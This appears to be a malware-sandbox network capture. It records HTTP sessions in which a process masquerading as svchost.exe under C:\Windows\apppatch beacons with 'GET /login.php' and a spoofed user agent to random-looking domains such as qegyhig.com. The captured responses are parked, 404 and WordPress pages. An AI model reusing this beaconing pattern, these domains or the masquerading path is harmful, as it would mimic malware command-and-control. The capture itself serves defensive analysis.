                                                                                                                                                                                                              Data Ascii: 858<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==><head><meta charset="utf-8"><title>gahyqah.com&nbsp;-&nbsp;gahyqah Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="gahyqah.com is your first and best source for all of the information youre looking for. From g
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.771985054 CET212INData Raw: 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 67 61 68 79 71 61 68 2e 63 6f 6d 20 68 61 73 20 69 74 20 61 6c
                                                                                                                                                                                                              Data Ascii: eneral topics to more of what you would expect to find here, gahyqah.com has it all. We hope you find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.771996975 CET1236INData Raw: 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 6c 6f 67 6f 73 2f 73 65 64 6f 5f 6c 6f 67 6f 2e 70 6e 67 22 0a 2f 3e 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 76 37 2e 30 2e 30 20 7c 20 4d
                                                                                                                                                                                                              Data Ascii: .com/templates/logos/sedo_logo.png"/><style> /*! normalize.css v7.0.0 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,footer,
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.772142887 CET1236INData Raw: 74 6f 6e 2c 68 74 6d 6c 20 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 2c 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 62 75 74 74 6f 6e 7d 62 75 74 74 6f 6e
                                                                                                                                                                                                              Data Ascii: ton,html [type=button],[type=reset],[type=submit]{-webkit-appearance:button}button::-mo1088z-focus-inner,[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner{border-style:none;padding:0}button:-moz
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.772156000 CET1236INData Raw: 6e 65 72 2d 68 65 61 64 65 72 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 68 65 61 64 65 72 5f 5f 63 6f 6e 74 65 6e 74 7b 63 6f 6c 6f 72
                                                                                                                                                                                                              Data Ascii: ner-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center}.container-buybox__content-buybox{display:inline-block;text-align:left}.container-buybox__content-heading{font-size:
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.772170067 CET636INData Raw: 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 61 63 74 2d 75 73 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 61 63 74 2d 75 73 5f 5f 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61
                                                                                                                                                                                                              Data Ascii: 9494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-link{font-size:10px;color:#949494}.container-privacyPolicy{text-align:center}.c
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.772511005 CET1236INData Raw: 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 69 6e 74 65 72 61 63 74 69 76 65 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 6d 61 72 67 69 6e 3a 30 20 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 7d 2e 63 6f 6e 74 61
                                                                                                                                                                                                              Data Ascii: e-message__content-interactive{text-align:left;margin:0 15px;font-size:10px}.container-cookie-message__content-interactive-header,.container-cookie-message__content-interactive-text{color:#fff}.container-cookie-message__content-interactive-hea
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.772522926 CET1236INData Raw: 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 20 32 35 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 75 72 73 6f 72 3a 70
                                                                                                                                                                                                              Data Ascii: order-radius:5px;padding:15px 25px;text-align:center;text-decoration:none;cursor:pointer;margin:5px;transition:.3s}.btn--success{background-color:#218838;border-color:#218838;color:#fff;font-size:x-large}.btn--success:hover{background-color:#1
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.772536993 CET1236INData Raw: 66 66 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 7d 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 2d 2d 72 6f 75 6e 64 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 34 70 78
                                                                                                                                                                                                              Data Ascii: ff;-webkit-transition:.4s;transition:.4s}.switch__slider--round{border-radius:34px}.switch__slider--round:before{border-radius:50%}input:checked+.switch__slider{background-color:#007bff}input:focus+.switch__slider{box-shadow:0 0 1px #007bff}in
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.772903919 CET1236INData Raw: 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 62 67 2f 61 72 72 6f 77 73 2d 63 75 72 76 65 64 2e 70 6e 67 22 29 20 23 30 65 31 36 32 65 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 6c 65 66 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                                              Data Ascii: com/templates/bg/arrows-curved.png") #0e162e no-repeat center left;background-size:94% 640px;flex-grow:2;z-index:-1;top:50px;position:inherit}.container-content__right{background:url("//img.sedoparking.com/templates/bg/arrows-curved.png") #0e1
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.776899099 CET1236INData Raw: 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d
                                                                                                                                                                                                              Data Ascii: -ads-list__list-element-content{display:inline-block}.two-tier-ads-list__list-element-header-link{font-size:37px;font-weight:bold;text-decoration:underline;color:#9fd801}.two-tier-ads-list__list-element-text{padding:3px 0 6px 0;margin:.11em 0;


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                              69192.168.2.857739154.212.231.8280
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:35:04.339593887 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gadyniw.com
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.261358976 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:35:05 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 548
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.263849020 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gadyniw.com
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.626763105 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:35:05 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 548
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              70192.168.2.857740188.114.96.3807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.036922932 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.732727051 CET966INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:35:05 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: https://qegyhig.com/login.php
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qeuQ43CNxzwGRj9UTpjCRsosV%2B3kTZ5qaJkba7rXb9SfZAD7wp1XPTWZvot3m08bcv6nXPPH13xNMwXv6zPDQm1i4kRBaNurobydHijdX37g1TGiY7E%2B2UnmhzJBgw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e10096ac9ca17bd-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1589&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                              Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              0192.168.2.849720188.114.96.34437652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-11-11 17:33:09 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              2024-11-11 17:33:10 UTC952INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:10 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                              link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ge6GOPmFxSV%2B%2BT1%2BTIQRK%2FQnxWhDhab5m1AReH97BZwIblOhjTwPxAQzqDYJi5Ikbxcxs638E8NKaGwhpmfZYd6iogWjk3EkTy5J3c4C7O9n1zIcGr9RLqJ5P%2F9thA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e1006993f408c7b-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1327&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=881&delivery_rate=2177443&cwnd=251&unsent_bytes=0&cid=abb06ee54315933e&ts=1213&x=0"
                                                                                                                                                                                                              2024-11-11 17:33:10 UTC417INData Raw: 37 63 61 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                              Data Ascii: 7ca6<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                              2024-11-11 17:33:10 UTC1369INData Raw: 2f 73 74 79 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70
                                                                                                                                                                                                              Data Ascii: /style><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><meta p
                                                                                                                                                                                                              2024-11-11 17:33:10 UTC1369INData Raw: 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76
                                                                                                                                                                                                              Data Ascii: ction c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canv
                                                                                                                                                                                                              2024-11-11 17:33:10 UTC1369INData Raw: 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e
                                                                                                                                                                                                              Data Ascii: ned"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON
                                                                                                                                                                                                              2024-11-11 17:33:10 UTC1369INData Raw: 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65
                                                                                                                                                                                                              Data Ascii: .concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='astra-theme-css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minifie
                                                                                                                                                                                                              2024-11-11 17:33:10 UTC1369INData Raw: 69 74 65 2d 64 65 73 63 72 69 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e
                                                                                                                                                                                                              Data Ascii: ite-description{font-size:15px;font-size:0.9375rem;display:none;}.entry-title{font-size:26px;font-size:1.625rem;}h1,.entry-content h1{font-size:40px;font-size:2.5rem;font-weight:600;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;fon
